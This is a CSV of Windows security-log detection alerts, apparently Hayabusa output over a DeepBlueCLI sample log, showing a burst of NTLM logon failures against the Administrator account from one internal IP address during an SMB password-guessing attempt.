2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8m9SJ1aFpvFqClU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dM84lQYVfHhZmgpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O5FrdBbYXWaqFkeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxiNMjsd3YfoCNa2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v1u5uD9SiDFq9VOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pZv9l3b7U8tIVmw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EfPqiBhm6hRX700 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uvqgri2KGIDAlg1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLXZMXKsjOaurgZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXtiRWHDJqpq69Ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeC1T9YkT1hXMcGG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPf6nlwAeuu7cf00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fvVUozD2RuIchN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP3rghcrgas3l3q1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MMtcQYoVoM57gTcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFjTWECEep09Abjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jUlguy8tKBo4DSUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GETwMERLpiVtMRkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhas9Vjc193EVcOg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmVAnxq39t7qbcEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13y2nnltjipwZqth | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDQrPBL1VodIcQLR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0Mp4jXeHd3b0CLw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3j89GmIDnG4v7JJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyRLZMoaXJUrPPfn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcoyOKUjEi1uCSpD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWQGVJLcVwgf4YJ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrFqG85mmjTYJ4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DqIh1QHTk470nrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feVbA94p6iT2pBeC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T30YHcE8ZG7FaxW7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaKHRwYtx2lGtOCG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDEDuMmlDZZfdkFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CObqGJQi1hOOI83J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhsE9bQeEwW21bAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: El1qxgjvGS0QSS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vtlr3HwzJcAfSxuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDayr44iXmE63vqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkNoLVOhnS8ayujK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3ggg78jjziKqijrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BodeSVqeqa5qBQDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yY7yxEcuGwWSJZV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oTlg6cvsz6Z6QpCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3pTALzqu4Ok6CUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdGagQIEcvQQMp4n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVu4reOyQEIkChHO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EJWNS69MmMGLSnHc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPaR2sBxPPCjxpL0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kJJ9A1EfqM4V2TRv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dxf59xjpxO3oG17 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dMI12g4tjSF8PX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZAqN0xPaW4jg2Kjc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mcnReyIEaqsQfowV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: akOH8Y7XdjOpqTez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b0HOK1TIqloud7gh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n6uIAK55BmTnA6Bf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDnn6QmLOJ6KwzKt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np8KaRJvRqBrGyFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dxbu69Amr6gWN5Hw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoZdaFJWNON8Ujnc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q4RSlXgOS7sssCqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2PJprE7olK4pjrx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQOAUcWQL32y2gGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXI0wWwzhHN0uvOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujGqTzfOhmKgoAjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cFoPtWZ03O3ZZgOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyO2VTnpGZLeSIvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ua69MEWABQ9hsooT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubPQWn4nQYr3rXr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xrgATdNqkA44nKqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKwktiUfTWakNx3I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVebPFnWhbZKIANs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IyV8stIvfXLJQpsn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uStfvm0y0eZrWONH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
